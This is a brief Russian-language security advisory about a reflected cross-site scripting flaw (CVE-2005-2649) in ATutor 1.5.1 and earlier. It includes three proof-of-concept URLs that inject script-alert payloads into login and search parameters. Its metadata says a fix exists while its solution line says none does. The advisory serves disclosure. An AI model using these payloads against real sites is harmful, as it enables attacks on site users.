Межсайтовый скриптинг в ATutor

Дата публикации:	21.08.2005
Всего просмотров:	1502
Опасность:	Низкая
Наличие исправления:	Да
Количество уязвимостей:	1
CVE ID:	CVE-2005-2649
Вектор эксплуатации:	Удаленная
Воздействие:	Межсайтовый скриптинг
CWE ID:	Нет данных
Наличие эксплоита:	Нет данных
Уязвимые продукты:	ATutor 1.x
	Уязвимые версии: ATutor 1.5.1 и более ранние версии Описание: Удаленный пользователь может выполнить XSS нападение. Пример/Эксплоит: http://[target]/tour/login.php?course="><script>alert('Matrix_Killer r0X');</script> http://[target]/tour/search.php?search=1&search=1&words="><script>alert('There is no other place like 127.0.0.1');</script>&include=all&find_in=all&d isplay_as=pages http://[target]/tour/search.php?search=1&words="><script>alert('Found By matrix_killer');</script>&include=all&find_in=all&display_as=pages&submit=Sea rch URL производителя: http://www.atutor.ca/ Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Подпишитесь на email рассылку